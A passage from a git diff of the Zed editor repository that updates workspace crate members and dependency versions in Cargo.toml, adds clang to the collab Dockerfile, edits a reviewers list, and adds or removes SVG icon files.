"crates/reqwest_client", - "crates/rich_text", "crates/rope", "crates/rpc", "crates/rules_library", @@ -182,10 +183,9 @@ members = [ "crates/storybook", "crates/streaming_diff", "crates/sum_tree", - "crates/supermaven", - "crates/supermaven_api", "crates/svg_preview", "crates/system_specs", + "crates/syntax_theme", "crates/tab_switcher", "crates/task", "crates/tasks_ui", @@ -196,6 +196,7 @@ members = [ "crates/text", "crates/theme", "crates/theme_extension", + "crates/theme_settings", "crates/theme_importer", "crates/theme_selector", "crates/time_format", @@ -220,6 +221,7 @@ members = [ "crates/x_ai", "crates/zed", "crates/zed_actions", + "crates/zed_credentials_provider", "crates/zed_env_vars", "crates/zeta_prompt", "crates/zlog", @@ -234,13 +236,13 @@ members = [ "extensions/glsl", "extensions/html", "extensions/proto", - "extensions/slash-commands-example", "extensions/test-extension", # # Tooling # + "tooling/compliance", "tooling/perf", "tooling/xtask", ] @@ -268,9 +270,6 @@ ai_onboarding = { path = "crates/ai_onboarding" } anthropic = { path = "crates/anthropic" } askpass = { path = "crates/askpass" } assets = { path = "crates/assets" } -assistant_text_thread = { path = "crates/assistant_text_thread" } -assistant_slash_command = { path = "crates/assistant_slash_command" } -assistant_slash_commands = { path = "crates/assistant_slash_commands" } audio = { path = "crates/audio" } auto_update = { path = "crates/auto_update" } auto_update_ui = { path = "crates/auto_update_ui" } @@ -291,6 +290,7 @@ collab_ui = { path = "crates/collab_ui" } collections = { path = "crates/collections", version = "0.1.0" } command_palette = { path = "crates/command_palette" } command_palette_hooks = { path = "crates/command_palette_hooks" } +compliance = { path = "tooling/compliance" } component = { path = "crates/component" } component_preview = { path = "crates/component_preview" } context_server = { path = "crates/context_server" } @@ -300,6 +300,7 @@ copilot_ui = { path = 
"crates/copilot_ui" } crashes = { path = "crates/crashes" } credentials_provider = { path = "crates/credentials_provider" } crossbeam = "0.8.4" +csv_preview = { path = "crates/csv_preview"} dap = { path = "crates/dap" } dap_adapters = { path = "crates/dap_adapters" } db = { path = "crates/db" } @@ -312,6 +313,7 @@ dev_container = { path = "crates/dev_container" } diagnostics = { path = "crates/diagnostics" } editor = { path = "crates/editor" } encoding_selector = { path = "crates/encoding_selector" } +env_var = { path = "crates/env_var" } etw_tracing = { path = "crates/etw_tracing" } eval_utils = { path = "crates/eval_utils" } extension = { path = "crates/extension" } @@ -329,6 +331,7 @@ git_hosting_providers = { path = "crates/git_hosting_providers" } git_ui = { path = "crates/git_ui" } go_to_line = { path = "crates/go_to_line" } google_ai = { path = "crates/google_ai" } +grammars = { path = "crates/grammars" } gpui = { path = "crates/gpui", default-features = false } gpui_linux = { path = "crates/gpui_linux", default-features = false } gpui_macos = { path = "crates/gpui_macos", default-features = false } @@ -353,6 +356,7 @@ journal = { path = "crates/journal" } json_schema_store = { path = "crates/json_schema_store" } keymap_editor = { path = "crates/keymap_editor" } language = { path = "crates/language" } +language_core = { path = "crates/language_core" } language_extension = { path = "crates/language_extension" } language_model = { path = "crates/language_model" } language_models = { path = "crates/language_models" } @@ -370,7 +374,7 @@ markdown_preview = { path = "crates/markdown_preview" } svg_preview = { path = "crates/svg_preview" } media = { path = "crates/media" } menu = { path = "crates/menu" } -mermaid-rs-renderer = { git = "https://github.com/zed-industries/mermaid-rs-renderer", branch = "fix-font-family-xml-escaping", default-features = false } +mermaid-rs-renderer = { git = "https://github.com/zed-industries/mermaid-rs-renderer", rev = 
"374db9ead5426697c6c2111151d9f246899bc638", default-features = false } migrator = { path = "crates/migrator" } mistral = { path = "crates/mistral" } multi_buffer = { path = "crates/multi_buffer" } @@ -381,6 +385,7 @@ node_runtime = { path = "crates/node_runtime" } notifications = { path = "crates/notifications" } ollama = { path = "crates/ollama" } onboarding = { path = "crates/onboarding" } +opencode = { path = "crates/opencode" } open_ai = { path = "crates/open_ai" } open_path_prompt = { path = "crates/open_path_prompt" } open_router = { path = "crates/open_router", features = ["schemars"] } @@ -427,10 +432,9 @@ sqlez_macros = { path = "crates/sqlez_macros" } story = { path = "crates/story" } streaming_diff = { path = "crates/streaming_diff" } sum_tree = { path = "crates/sum_tree" } -supermaven = { path = "crates/supermaven" } -supermaven_api = { path = "crates/supermaven_api" } codestral = { path = "crates/codestral" } system_specs = { path = "crates/system_specs" } +syntax_theme = { path = "crates/syntax_theme" } tab_switcher = { path = "crates/tab_switcher" } task = { path = "crates/task" } tasks_ui = { path = "crates/tasks_ui" } @@ -441,6 +445,7 @@ terminal_view = { path = "crates/terminal_view" } text = { path = "crates/text" } theme = { path = "crates/theme" } theme_extension = { path = "crates/theme_extension" } +theme_settings = { path = "crates/theme_settings" } theme_selector = { path = "crates/theme_selector" } time_format = { path = "crates/time_format" } platform_title_bar = { path = "crates/platform_title_bar" } @@ -465,6 +470,7 @@ worktree = { path = "crates/worktree" } x_ai = { path = "crates/x_ai" } zed = { path = "crates/zed" } zed_actions = { path = "crates/zed_actions" } +zed_credentials_provider = { path = "crates/zed_credentials_provider" } zed_env_vars = { path = "crates/zed_env_vars" } edit_prediction = { path = "crates/edit_prediction" } zeta_prompt = { path = "crates/zeta_prompt" } @@ -477,12 +483,11 @@ ztracing_macro = { path = 
"crates/ztracing_macro" } # External crates # -agent-client-protocol = { version = "=0.9.4", features = ["unstable"] } +agent-client-protocol = { version = "=0.10.2", features = ["unstable"] } aho-corasick = "1.1" alacritty_terminal = { git = "https://github.com/zed-industries/alacritty", rev = "9d9640d4" } any_vec = "0.14" anyhow = "1.0.86" -arrayvec = { version = "0.7.4", features = ["serde"] } ashpd = { version = "0.13", default-features = false, features = [ "async-io", "notification", @@ -493,7 +498,7 @@ ashpd = { version = "0.13", default-features = false, features = [ ] } async-channel = "2.5.0" async-compat = "0.2.1" -async-compression = { version = "0.4", features = ["gzip", "futures-io"] } +async-compression = { version = "0.4", features = ["bzip2", "gzip", "futures-io"] } async-dispatcher = "0.1" async-fs = "2.1" async-lock = "2.1" @@ -515,7 +520,6 @@ aws-smithy-runtime-api = { version = "1.9.2", features = ["http-1x", "client"] } aws-smithy-types = { version = "1.3.4", features = ["http-body-1-x"] } backtrace = "0.3" base64 = "0.22" -bincode = "1.2.1" bitflags = "2.6.0" brotli = "8.0.2" bytes = "1.0" @@ -540,23 +544,35 @@ criterion = { version = "0.5", features = ["html_reports"] } ctor = "0.4.0" dap-types = { git = "https://github.com/zed-industries/dap-types", rev = "1b461b310481d01e02b2603c16d7144b926339f8" } dashmap = "6.0" -derive_more = "0.99.17" +derive_more = { version = "2.1.1", features = [ + "add", + "add_assign", + "deref", + "deref_mut", + "display", + "from_str", + "mul", + "mul_assign", + "not", +] } dirs = "4.0" documented = "0.9.1" dotenvy = "0.15.0" +dunce = "1.0" ec4rs = "1.1" emojis = "0.6.1" env_logger = "0.11" encoding_rs = "0.8" exec = "0.3.1" -fancy-regex = "0.16.0" +fancy-regex = "0.17.0" fork = "0.4.0" futures = "0.3" futures-concurrency = "7.7.1" futures-lite = "1.13" -gh-workflow = { git = "https://github.com/zed-industries/gh-workflow", rev = "c9eac0ed361583e1072860d96776fa52775b82ac" } +gh-workflow = { git = 
"https://github.com/zed-industries/gh-workflow", rev = "37f3c0575d379c218a9c455ee67585184e40d43f" } git2 = { version = "0.20.1", default-features = false, features = ["vendored-libgit2"] } globset = "0.4" +heapless = "0.9.2" handlebars = "4.3" heck = "0.5" heed = { version = "0.21.0", features = ["read-txn-no-tls"] } @@ -565,7 +581,6 @@ human_bytes = "0.4.1" html5ever = "0.27.0" http = "1.1" http-body = "1.0" -hyper = "0.14" ignore = "0.4.22" image = "0.25.1" imara-diff = "0.1.8" @@ -576,25 +591,28 @@ itertools = "0.14.0" json_dotpath = "1.1" jsonschema = "0.37.0" jsonwebtoken = "10.0" -jupyter-protocol = "1.2.0" +jupyter-protocol = "1.4.0" jupyter-websocket-client = "1.0.0" libc = "0.2" libsqlite3-sys = { version = "0.30.1", features = ["bundled"] } linkify = "0.10.0" +libwebrtc = "0.3.26" +livekit = { version = "0.7.32", features = ["tokio", "rustls-tls-native-roots"] } log = { version = "0.4.16", features = ["kv_unstable_serde", "serde"] } -lsp-types = { git = "https://github.com/zed-industries/lsp-types", rev = "a4f410987660bf560d1e617cb78117c6b6b9f599" } +lsp-types = { git = "https://github.com/zed-industries/lsp-types", rev = "c7396459fefc7886b4adfa3b596832405ae1e880" } mach2 = "0.5" markup5ever_rcdom = "0.3.0" metal = "0.33" -minidumper = "0.8" +minidumper = "0.9" moka = { version = "0.12.10", features = ["sync"] } -naga = { version = "28.0", features = ["wgsl-in"] } +naga = { version = "29.0", features = ["wgsl-in"] } nanoid = "0.4" -nbformat = "1.1.0" +nbformat = "1.2.0" nix = "0.29" num-format = "0.4.4" objc = "0.2" -objc2-foundation = { version = "=0.3.1", default-features = false, features = [ +objc2-app-kit = { version = "0.3", default-features = false, features = [ "NSGraphics" ] } +objc2-foundation = { version = "=0.3.2", default-features = false, features = [ "NSArray", "NSAttributedString", "NSBundle", @@ -628,18 +646,21 @@ parse_int = "0.9" pciid-parser = "0.8.0" pathdiff = "0.2" percent-encoding = "2.3.2" -pet = { git = 
"https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-reporter = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } +pet = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-reporter = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } portable-pty = "0.9.0" postage = { version = "0.5", features = ["futures-traits"] } pretty_assertions = { version = "1.3.0", features = ["unstable"] } 
proc-macro2 = "1.0.93" profiling = "1" +# replace this with main when #635 is merged +proptest = { git = "https://github.com/proptest-rs/proptest", rev = "3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b", features = ["attr-macro"] } +proptest-derive = "0.8.0" prost = "0.9" prost-build = "0.9" prost-types = "0.9" @@ -660,10 +681,10 @@ reqwest = { git = "https://github.com/zed-industries/reqwest.git", rev = "c15662 "stream", ], package = "zed-reqwest", version = "0.12.15-zed" } rsa = "0.9.6" -runtimelib = { version = "1.2.0", default-features = false, features = [ +runtimelib = { version = "1.4.0", default-features = false, features = [ "async-dispatcher-runtime", "aws-lc-rs" ] } -rust-embed = { version = "8.4", features = ["include-exclude"] } +rust-embed = { version = "8.11", features = ["include-exclude"] } rustc-hash = "2.1.0" rustls = { version = "0.23.26" } rustls-platform-verifier = "0.5.0" @@ -678,7 +699,6 @@ serde_json_lenient = { version = "0.2", features = [ "raw_value", ] } serde_path_to_error = "0.1.17" -serde_repr = "0.1" serde_urlencoded = "0.7" sha2 = "0.10" shellexpand = "2.1.0" @@ -707,9 +727,8 @@ time = { version = "0.3", features = [ "formatting", "local-offset", ] } -tiny_http = "0.8" +tiny_http = "0.12" tokio = { version = "1" } -tokio-tungstenite = { version = "0.26", features = ["__rustls-tls"] } tokio-socks = { version = "0.5.2", default-features = false, features = [ "futures-io", "tokio", @@ -721,7 +740,7 @@ toml_edit = { version = "0.22", default-features = false, features = [ "serde", ] } tower-http = "0.4.4" -tree-sitter = { version = "0.26", features = ["wasm"] } +tree-sitter = { version = "0.26.8", features = ["wasm"] } tree-sitter-bash = "0.25.1" tree-sitter-c = "0.24.1" tree-sitter-cpp = { git = "https://github.com/tree-sitter/tree-sitter-cpp", rev = "5cb9b693cfd7bfacab1d9ff4acac1a4150700609" } @@ -741,7 +760,7 @@ tree-sitter-md = { git = "https://github.com/tree-sitter-grammars/tree-sitter-ma tree-sitter-python = "0.25" tree-sitter-regex = 
"0.24" tree-sitter-ruby = "0.23" -tree-sitter-rust = "0.24" +tree-sitter-rust = "0.24.2" tree-sitter-typescript = { git = "https://github.com/zed-industries/tree-sitter-typescript", rev = "e2c53597d6a5d9cf7bbe8dccde576fe1e46c5899" } # https://github.com/tree-sitter/tree-sitter-typescript/pull/347 tree-sitter-yaml = { git = "https://github.com/zed-industries/tree-sitter-yaml", rev = "baff0b51c64ef6a1fb1f8390f3ad6015b83ec13a" } tracing = "0.1.40" @@ -756,7 +775,7 @@ uuid = { version = "1.1.2", features = ["v4", "v5", "v7", "serde"] } walkdir = "2.5" wasm-encoder = "0.221" wasmparser = "0.221" -wasmtime = { version = "33", default-features = false, features = [ +wasmtime = { version = "36", default-features = false, features = [ "async", "demangle", "runtime", @@ -765,12 +784,13 @@ wasmtime = { version = "33", default-features = false, features = [ "incremental-cache", "parallel-compilation", ] } -wasmtime-wasi = "33" +wasmtime-wasi = "36" wax = "0.7" which = "6.0.0" -wasm-bindgen = "0.2.104" +wasm-bindgen = "0.2.113" web-time = "1.1.0" -wgpu = "28.0" +webrtc-sys = "0.3.23" +wgpu = { git = "https://github.com/zed-industries/wgpu.git", branch = "v29" } windows-core = "0.61" yawc = "0.2.5" zeroize = "1.8" @@ -781,17 +801,20 @@ zstd = "0.11" version = "0.61" features = [ "Foundation_Numerics", + "Globalization_DateTimeFormatting", "Storage_Search", "Storage_Streams", "System_Threading", "UI_ViewManagement", "Wdk_System_SystemServices", + "Win32_Foundation", "Win32_Globalization", "Win32_Graphics_Direct3D", "Win32_Graphics_Direct3D11", "Win32_Graphics_Direct3D_Fxc", "Win32_Graphics_DirectComposition", "Win32_Graphics_DirectWrite", + "Win32_Graphics_DirectManipulation", "Win32_Graphics_Dwm", "Win32_Graphics_Dxgi", "Win32_Graphics_Dxgi_Common", @@ -806,6 +829,7 @@ features = [ "Win32_System_Com", "Win32_System_Com_StructuredStorage", "Win32_System_Console", + "Win32_System_Diagnostics_Debug", "Win32_System_DataExchange", "Win32_System_IO", "Win32_System_LibraryLoader", @@ 
-813,6 +837,7 @@ features = [ "Win32_System_Ole", "Win32_System_Performance", "Win32_System_Pipes", + "Win32_System_RestartManager", "Win32_System_SystemInformation", "Win32_System_SystemServices", "Win32_System_Threading", @@ -822,6 +847,7 @@ features = [ "Win32_UI_HiDpi", "Win32_UI_Input_Ime", "Win32_UI_Input_KeyboardAndMouse", + "Win32_UI_Input_Pointer", "Win32_UI_Shell", "Win32_UI_Shell_Common", "Win32_UI_Shell_PropertiesSystem", @@ -835,6 +861,9 @@ notify = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24c notify-types = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24cad542c28e04ced02e20325a4ec28a31d" } windows-capture = { git = "https://github.com/zed-industries/windows-capture.git", rev = "f0d6c1b6691db75461b732f6d5ff56eed002eeb9" } calloop = { git = "https://github.com/zed-industries/calloop" } +livekit = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" } +libwebrtc = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" } +webrtc-sys = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" } [profile.dev] split-debuginfo = "unpacked" @@ -894,7 +923,6 @@ sidebar = { codegen-units = 1 } snippet = { codegen-units = 1 } snippets_ui = { codegen-units = 1 } story = { codegen-units = 1 } -supermaven_api = { codegen-units = 1 } telemetry_events = { codegen-units = 1 } theme_selector = { codegen-units = 1 } time_format = { codegen-units = 1 } diff --git a/Dockerfile-collab b/Dockerfile-collab index 63359334906b58c560c0ed6acc6378259ccbd5c5..fbbcb0df0484c26a65823171cc976de8cb838b8c 100644 --- a/Dockerfile-collab +++ b/Dockerfile-collab @@ -1,6 +1,6 @@ # syntax = docker/dockerfile:1.2 -FROM rust:1.93-bookworm as builder +FROM rust:1.94-bookworm as builder WORKDIR app COPY . . 
@@ -14,8 +14,12 @@ ARG GITHUB_SHA ENV GITHUB_SHA=$GITHUB_SHA # Also add `cmake`, since we need it to build `wasmtime`. +# clang is needed because `webrtc-sys` uses Clang-specific compiler flags. RUN apt-get update; \ - apt-get install -y --no-install-recommends cmake + apt-get install -y --no-install-recommends cmake clang + +ENV CC=clang +ENV CXX=clang++ RUN --mount=type=cache,target=./script/node_modules \ --mount=type=cache,target=/usr/local/cargo/registry \ diff --git a/REVIEWERS.conl b/REVIEWERS.conl index 82086b7f42cbb123487030cf7d2e64fc1288cbd2..85cdb3ee89c10b1bfb567a0007a603cc01f922c7 100644 --- a/REVIEWERS.conl +++ b/REVIEWERS.conl @@ -122,6 +122,5 @@ vim = @probably-neb windows - = @localcc = @reflectronic = @Veykril diff --git a/assets/icons/ai.svg b/assets/icons/ai.svg deleted file mode 100644 index 4236d50337bef92cb550cdbf71d83843ab35e2f3..0000000000000000000000000000000000000000 --- a/assets/icons/ai.svg +++ /dev/null @@ -1,27 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/assets/icons/ai_open_code.svg b/assets/icons/ai_open_code.svg new file mode 100644 index 0000000000000000000000000000000000000000..304b155188c2286a4f8cab208872d0373d8099f1 --- /dev/null +++ b/assets/icons/ai_open_code.svg @@ -0,0 +1,3 @@ + + + diff --git a/assets/icons/archive.svg b/assets/icons/archive.svg new file mode 100644 index 0000000000000000000000000000000000000000..9ffe3f39d27c7fe5cbb532a4f263c8800398e96f --- /dev/null +++ b/assets/icons/archive.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/box_open.svg b/assets/icons/box_open.svg new file mode 100644 index 0000000000000000000000000000000000000000..5e30fc40c3446485412e2a2607b0d07dc2f68b4b --- /dev/null +++ b/assets/icons/box_open.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/cog.svg b/assets/icons/cog.svg deleted file mode 100644 index 7dd3a8befff59b5aaa0506df9b2cd7140725ab81..0000000000000000000000000000000000000000 --- a/assets/icons/cog.svg +++ /dev/null @@ -1 +0,0 @@ - 
diff --git a/assets/icons/diff_split.svg b/assets/icons/diff_split.svg index de2056466f7ef1081ee00dabb8b4d5baa8fc9217..dcafeb8df5c28bcac1f1fe8cf5783eebd8d8cd8a 100644 --- a/assets/icons/diff_split.svg +++ b/assets/icons/diff_split.svg @@ -1,5 +1,4 @@ - - - + + diff --git a/assets/icons/diff_split_auto.svg b/assets/icons/diff_split_auto.svg new file mode 100644 index 0000000000000000000000000000000000000000..f9dd7076be75aaf3e90286140a60deece5016114 --- /dev/null +++ b/assets/icons/diff_split_auto.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/diff_unified.svg b/assets/icons/diff_unified.svg index b2d3895ae5466454e9cefc4e77e3c3f2a19cde8c..28735c16f682159b6b0a099176d6fc3b75cd248e 100644 --- a/assets/icons/diff_unified.svg +++ b/assets/icons/diff_unified.svg @@ -1,4 +1,4 @@ - - + + diff --git a/assets/icons/ellipsis_vertical.svg b/assets/icons/ellipsis_vertical.svg deleted file mode 100644 index c38437667ebbe095aaa4be27244997a9138bf659..0000000000000000000000000000000000000000 --- a/assets/icons/ellipsis_vertical.svg +++ /dev/null @@ -1,5 +0,0 @@ - - - - - diff --git a/assets/icons/eye_off.svg b/assets/icons/eye_off.svg new file mode 100644 index 0000000000000000000000000000000000000000..3057c3050c36c72be314f9b0646d44932c52e4ee --- /dev/null +++ b/assets/icons/eye_off.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/file_icons/editorconfig.svg b/assets/icons/file_icons/editorconfig.svg new file mode 100644 index 0000000000000000000000000000000000000000..81355bec4603e678c3b1d1097d00ef03da5edf7f --- /dev/null +++ b/assets/icons/file_icons/editorconfig.svg @@ -0,0 +1,3 @@ + + + diff --git a/assets/icons/file_icons/gitlab.svg b/assets/icons/file_icons/gitlab.svg new file mode 100644 index 0000000000000000000000000000000000000000..f0faf570b125c7764e769ae60f7a6ce6f7825ceb --- /dev/null +++ b/assets/icons/file_icons/gitlab.svg @@ -0,0 +1 @@ + diff --git a/assets/icons/file_icons/helm.svg b/assets/icons/file_icons/helm.svg new file mode 100644 index 
0000000000000000000000000000000000000000..03e702f2d5081c4e96ff4db7ba7428817b08748f --- /dev/null +++ b/assets/icons/file_icons/helm.svg @@ -0,0 +1 @@ + diff --git a/assets/icons/file_icons/yaml.svg b/assets/icons/file_icons/yaml.svg new file mode 100644 index 0000000000000000000000000000000000000000..2c3efd46cd45ff67d6c46d84476d563dd5ac3a73 --- /dev/null +++ b/assets/icons/file_icons/yaml.svg @@ -0,0 +1 @@ + diff --git a/assets/icons/folder_plus.svg b/assets/icons/folder_plus.svg new file mode 100644 index 0000000000000000000000000000000000000000..a543448ed6197043291369bee640e23b6ad729b9 --- /dev/null +++ b/assets/icons/folder_plus.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/git_merge_conflict.svg b/assets/icons/git_merge_conflict.svg new file mode 100644 index 0000000000000000000000000000000000000000..10bc2c04fc9877112723273b0d60351c3a4c56bc --- /dev/null +++ b/assets/icons/git_merge_conflict.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/git_worktree.svg b/assets/icons/git_worktree.svg new file mode 100644 index 0000000000000000000000000000000000000000..25b49bc69f34d8a742451709d4d4a164f29248b6 --- /dev/null +++ b/assets/icons/git_worktree.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/list_collapse.svg b/assets/icons/list_collapse.svg index f18bc550b90228c2f689848b86cfc5bea3d6ff50..dbdb2aaa4537c25ba1867d4957c23819af425835 100644 --- a/assets/icons/list_collapse.svg +++ b/assets/icons/list_collapse.svg @@ -1 +1,7 @@ - + + + + + + + diff --git a/assets/icons/maximize_alt.svg b/assets/icons/maximize_alt.svg new file mode 100644 index 0000000000000000000000000000000000000000..b8b8705f902c2469ed959f93f89ca3caf3b8fc51 --- /dev/null +++ b/assets/icons/maximize_alt.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/menu_alt.svg b/assets/icons/menu_alt.svg deleted file mode 100644 index b9cc19e22febe045ca9ccf4a7e86d69b258f875c..0000000000000000000000000000000000000000 --- a/assets/icons/menu_alt.svg +++ /dev/null @@ -1,3 +0,0 
@@ - - - diff --git a/assets/icons/new_thread.svg b/assets/icons/new_thread.svg new file mode 100644 index 0000000000000000000000000000000000000000..19b8fa25ea30ed47a57a5d5f83d62f2b4b56b61e --- /dev/null +++ b/assets/icons/new_thread.svg @@ -0,0 +1,4 @@ + + + + diff --git a/assets/icons/open_folder.svg b/assets/icons/open_folder.svg new file mode 100644 index 0000000000000000000000000000000000000000..c4aa32b29cc1048fd4ecd8b1b4d32b68ae0a8ad3 --- /dev/null +++ b/assets/icons/open_folder.svg @@ -0,0 +1,4 @@ + + + + diff --git a/assets/icons/queue_message.svg b/assets/icons/queue_message.svg new file mode 100644 index 0000000000000000000000000000000000000000..1bdf6738bcf3143fc13a820281cf1cab8531bd36 --- /dev/null +++ b/assets/icons/queue_message.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/shield_check.svg b/assets/icons/shield_check.svg deleted file mode 100644 index 43b52f43a8d70beb6e69c2271235090db4dc2c00..0000000000000000000000000000000000000000 --- a/assets/icons/shield_check.svg +++ /dev/null @@ -1,4 +0,0 @@ - - - - diff --git a/assets/icons/signal_high.svg b/assets/icons/signal_high.svg new file mode 100644 index 0000000000000000000000000000000000000000..6c1fec96098242444407fb9f66a025d03a10e50b --- /dev/null +++ b/assets/icons/signal_high.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/signal_low.svg b/assets/icons/signal_low.svg new file mode 100644 index 0000000000000000000000000000000000000000..b0ebccdd4c8897e8fdaf013a56cc4498dc5e0fe7 --- /dev/null +++ b/assets/icons/signal_low.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/signal_medium.svg b/assets/icons/signal_medium.svg new file mode 100644 index 0000000000000000000000000000000000000000..3652724dc8b095dd68eb9977108711e71ffe67cb --- /dev/null +++ b/assets/icons/signal_medium.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/stop.svg b/assets/icons/stop.svg index cc2bbe9207acf5acd44ff13e93140099d222250b..5ca9cd29edf17981500482b81e47aa53a16e2713 100644 --- 
a/assets/icons/stop.svg +++ b/assets/icons/stop.svg @@ -1,3 +1,3 @@ - + diff --git a/assets/icons/swatch_book.svg b/assets/icons/swatch_book.svg deleted file mode 100644 index b37d5df8c1a5f0f6b9fa9cb46b3004a2ba55da4f..0000000000000000000000000000000000000000 --- a/assets/icons/swatch_book.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/sweep_ai.svg b/assets/icons/sweep_ai.svg deleted file mode 100644 index 9c63c810dd9e164c14c1ad1a1bca9c6ec68fc95e..0000000000000000000000000000000000000000 --- a/assets/icons/sweep_ai.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/sweep_ai_disabled.svg b/assets/icons/sweep_ai_disabled.svg deleted file mode 100644 index b15a8d8526f36f312482effefd3d7538ce5f7a04..0000000000000000000000000000000000000000 --- a/assets/icons/sweep_ai_disabled.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/sweep_ai_down.svg b/assets/icons/sweep_ai_down.svg deleted file mode 100644 index f08dcb171811c761cd13c4efd0ef0acdc78f9951..0000000000000000000000000000000000000000 --- a/assets/icons/sweep_ai_down.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/sweep_ai_error.svg b/assets/icons/sweep_ai_error.svg deleted file mode 100644 index 95285a1273e72ec4f02cb23e3c2fb39460f42761..0000000000000000000000000000000000000000 --- a/assets/icons/sweep_ai_error.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/sweep_ai_up.svg b/assets/icons/sweep_ai_up.svg deleted file mode 100644 index 7c28282a6a14c47561a50ab456c0bec2e05b07cc..0000000000000000000000000000000000000000 --- a/assets/icons/sweep_ai_up.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/terminal_ghost.svg b/assets/icons/terminal_ghost.svg deleted file mode 100644 index 7d0d0e068e8a6f01837e860e8223690a95541769..0000000000000000000000000000000000000000 --- a/assets/icons/terminal_ghost.svg +++ /dev/null @@ -1,4 +0,0 @@ - - - - diff --git a/assets/icons/text_thread.svg b/assets/icons/text_thread.svg deleted file mode 100644 index 
aa078c72a2f35d2b82e90f2be64d23fcda3418a5..0000000000000000000000000000000000000000 --- a/assets/icons/text_thread.svg +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - diff --git a/assets/icons/thread.svg b/assets/icons/thread.svg index 496cf42e3a3ee1439f36b8e2479d05564362e628..569a6f3aec7e3b8742d3d7d23fe11db5aea199ba 100644 --- a/assets/icons/thread.svg +++ b/assets/icons/thread.svg @@ -1,3 +1,4 @@ - + + diff --git a/assets/icons/thread_import.svg b/assets/icons/thread_import.svg new file mode 100644 index 0000000000000000000000000000000000000000..a56b5a7cccc09c5795bfadff06f06d15833232f3 --- /dev/null +++ b/assets/icons/thread_import.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_left_closed.svg b/assets/icons/threads_sidebar_left_closed.svg new file mode 100644 index 0000000000000000000000000000000000000000..feb1015254635ef65f90f2c9ea38efab74d01d60 --- /dev/null +++ b/assets/icons/threads_sidebar_left_closed.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_left_open.svg b/assets/icons/threads_sidebar_left_open.svg new file mode 100644 index 0000000000000000000000000000000000000000..8057b060a84d7d7ffcf29aff1c0c79a8764edc22 --- /dev/null +++ b/assets/icons/threads_sidebar_left_open.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_right_closed.svg b/assets/icons/threads_sidebar_right_closed.svg new file mode 100644 index 0000000000000000000000000000000000000000..10fa4b792fd65b5875dcf2cadab1fc12a123ab47 --- /dev/null +++ b/assets/icons/threads_sidebar_right_closed.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_right_open.svg b/assets/icons/threads_sidebar_right_open.svg new file mode 100644 index 0000000000000000000000000000000000000000..23a01eb3f82a5866157220172c868ed9ded46033 --- /dev/null +++ b/assets/icons/threads_sidebar_right_open.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/tool_read.svg b/assets/icons/tool_read.svg deleted file mode 100644 index 
